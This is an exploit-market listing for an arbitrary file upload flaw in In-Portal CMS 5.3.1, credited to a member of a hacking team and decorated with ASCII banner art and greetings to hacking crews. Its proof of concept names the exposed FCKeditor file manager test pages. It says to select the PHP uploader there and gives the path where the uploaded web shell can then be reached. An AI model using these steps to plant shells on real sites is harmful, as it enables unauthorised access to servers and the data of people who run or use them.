[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

In-Portal CMS Arbitrary File Upload Vulnerability

Author
DoSs-Dz
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-17978
Category
web applications
Date add
05-04-2012
Platform
php
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0      _                   __           __       __                      1
1    /' \            __  /'__`\        /\ \__  /'__`\                    0
0   /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___            1
1   \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\           0
0      \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/            1
1       \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\            0
0        \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/            1
1                   \ \____/ >> Exploit database separated by exploit    0
0                    \/___/          type (local, remote, DoS, etc.)     1
1                                                                        1
0  [»] Site            : 1337day.com                                     0
1  [»] Support e-mail  : submit[@]1337day.com                            1
0                                                                        0
1               +---------------------------------------+                1
0               |I'm DoSs-Dz Member From Inj3ct0r Team  |                1
1               +---------------------------------------+                0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1
+----------------------------------------------------------------------------+
# Exploit Title :  In-Portal CMS Arbitrary File Upload Vulnerability 
# Date :  05 April 2012
# Vendor Site : http://www.in-portal.com/modules/downloads/download/content-management-cms.html?env=file.downl---
# Version : 5.3.1
# Tested On : windows 7 professional
# Big Thank to : Inj3ct0r Team & Inj3ct0r Operators "CrosS"
+----------------------------------------------------------------------------+



[!1»] Upload Exploit P0C =» 
   
   ------------------------------------------------------------------------------------
   First p0c is : 
   http://127.0.0.1/portal/core/editor/editor/filemanager/connectors/uploadtest.html
   -> Select the "File Uploader" to use: PHP or asp
   ------------------------------------------------------------------------------------
   Second p0c is : 
   http://127.0.0.1/portal/core/editor/editor/filemanager/connectors/test.html   
   -> Select the "File Uploader" to use: PHP or asp
   ------------------------------------------------------------------------------------
   To see your upload file(shell) Just  go to : 
   http://127.0.0.1/portal/system/user_files/'Dz.php.txt' < -- Your Shell 
   ------------------------------------------------------------------------------------   
+--------------------------------------------------------------------------------------------------------+
|[»] Greetz to =» [ Robert Miles ] , [ Black-ID ] , [ Abdou Abdo ] , [ Hacker_Dz] , [ Damane2011 ]       |
|[»] Greetz to =» [ 1337day.com ] , [ sec4ever.com ] , [ Dz4all.com ] , [ v4-team.com ] , [ Vbspiders ]  |
+--------------------------------------------------------------------------------------------------------+
+------------------------------------+ 
|./ Gheurrara on : 05 april 2012     |
+------------------------------------+ 



#  0day.today [2024-12-26]  #